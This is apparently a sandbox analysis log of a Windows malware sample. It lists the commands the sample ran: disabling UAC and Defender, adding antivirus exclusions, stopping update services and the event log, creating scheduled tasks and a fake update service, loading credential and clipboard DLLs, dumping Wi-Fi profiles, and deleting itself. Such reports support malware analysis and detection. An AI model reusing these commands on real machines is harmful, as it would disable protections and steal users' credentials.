Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe

"C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"

C:\Users\Admin\Pictures\IglGrnQY4KjxY4ESkNLr1P49.exe

"C:\Users\Admin\Pictures\IglGrnQY4KjxY4ESkNLr1P49.exe"

C:\Users\Admin\Pictures\YcZF7SNXvFMc37DYXI3ziUaW.exe

"C:\Users\Admin\Pictures\YcZF7SNXvFMc37DYXI3ziUaW.exe"

C:\Users\Admin\AppData\Local\Temp\is-7K59T.tmp\IglGrnQY4KjxY4ESkNLr1P49.tmp

"C:\Users\Admin\AppData\Local\Temp\is-7K59T.tmp\IglGrnQY4KjxY4ESkNLr1P49.tmp" /SL5="$C01D8,1511216,54272,C:\Users\Admin\Pictures\IglGrnQY4KjxY4ESkNLr1P49.exe"

C:\Users\Admin\Pictures\MjaQmNnsQNMq8m3PWjNhbwcJ.exe

"C:\Users\Admin\Pictures\MjaQmNnsQNMq8m3PWjNhbwcJ.exe"

C:\Users\Admin\AppData\Local\Temp\syncUpd.exe

C:\Users\Admin\AppData\Local\Temp\syncUpd.exe

C:\Users\Admin\AppData\Local\Lina Text\linatext.exe

"C:\Users\Admin\AppData\Local\Lina Text\linatext.exe" -i

C:\Users\Admin\AppData\Local\Lina Text\linatext.exe

"C:\Users\Admin\AppData\Local\Lina Text\linatext.exe" -s

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "

C:\Windows\SysWOW64\chcp.com

chcp 1251

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F

C:\Users\Admin\Pictures\HaHE4yGhKaVOdJY4tH9U0wE2.exe

"C:\Users\Admin\Pictures\HaHE4yGhKaVOdJY4tH9U0wE2.exe"

C:\Users\Admin\Pictures\mqJpRwpbfK974CI6kSx5DDx3.exe

"C:\Users\Admin\Pictures\mqJpRwpbfK974CI6kSx5DDx3.exe"

C:\Users\Admin\Pictures\POWMHemIAdhWqbG9WwO5wEor.exe

"C:\Users\Admin\Pictures\POWMHemIAdhWqbG9WwO5wEor.exe"

C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe

"C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe" --silent --allusers=0

C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe

C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.29 --initial-client-data=0x2e8,0x2ec,0x2f0,0x2e4,0x2f4,0x6f1821f8,0x6f182204,0x6f182210

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\UzSZFMWFpthvMvdZfvnxrxs2.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\UzSZFMWFpthvMvdZfvnxrxs2.exe" --version

C:\Users\Admin\AppData\Local\Temp\7zS86E3.tmp\Install.exe

.\Install.exe

C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe

"C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=4268 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240315020143" --session-guid=400773cf-74a5-42b2-bfbf-cf7b684569cd --server-tracking-blob=... --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=0405000000000000

C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe

C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.29 --initial-client-data=0x2fc,0x300,0x304,0x2cc,0x308,0x6e6121f8,0x6e612204,0x6e612210

C:\Users\Admin\AppData\Local\Temp\7zS8CBF.tmp\Install.exe

.\Install.exe /QnjvBdidv "385118" /S

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gkcnbQSJR" /SC once /ST 01:09:33 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gkcnbQSJR"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"

C:\ProgramData\Google\Chrome\updater.exe

C:\ProgramData\Google\Chrome\updater.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\C3AE.bat" "

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1

C:\Windows\explorer.exe

explorer.exe

C:\Users\Admin\AppData\Local\Temp\33945c4f34\Dctooux.exe

C:\Users\Admin\AppData\Local\Temp\33945c4f34\Dctooux.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\GDGIJECGDG.exe"

C:\Users\Admin\AppData\Local\Temp\GDGIJECGDG.exe

"C:\Users\Admin\AppData\Local\Temp\GDGIJECGDG.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\GDGIJECGDG.exe

C:\Windows\SysWOW64\PING.EXE

ping 2.2.2.2 -n 1 -w 3000

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gkcnbQSJR"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bnTqljwkAIckBwCXiX" /SC once /ST 02:03:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\VcIJRFpHiPTKASLFH\cTmyoaxliqPIUed\BZzGTBs.exe\" tC /pnsite_idROA 385118 /S" /V1 /F

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403150201431\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403150201431\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll, Main

C:\Windows\system32\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll, Main

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403150201431\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403150201431\assistant\assistant_installer.exe" --version

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403150201431\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403150201431\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x26c,0x270,0x274,0x248,0x278,0xe70040,0xe7004c,0xe70058

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\757987694264_Desktop.zip' -CompressionLevel Optimal

C:\Users\Admin\AppData\Local\Temp\1346.exe

C:\Users\Admin\AppData\Local\Temp\1346.exe

C:\Users\Admin\AppData\Local\Temp\1346.exe

C:\Users\Admin\AppData\Local\Temp\1346.exe

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\clip64.dll, Main

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\a0e81e80-45cc-4456-972b-e9d648d8e4bd" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Users\Admin\AppData\Local\Temp\313E.exe

C:\Users\Admin\AppData\Local\Temp\313E.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 3940 -ip 3940

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3940 -s 1184

C:\Users\Admin\AppData\Local\Temp\1346.exe

"C:\Users\Admin\AppData\Local\Temp\1346.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\1346.exe

"C:\Users\Admin\AppData\Local\Temp\1346.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3216 -ip 3216

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3216 -s 572

C:\Users\Admin\AppData\Local\Temp\VcIJRFpHiPTKASLFH\cTmyoaxliqPIUed\BZzGTBs.exe

C:\Users\Admin\AppData\Local\Temp\VcIJRFpHiPTKASLFH\cTmyoaxliqPIUed\BZzGTBs.exe tC /pnsite_idROA 385118 /S

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

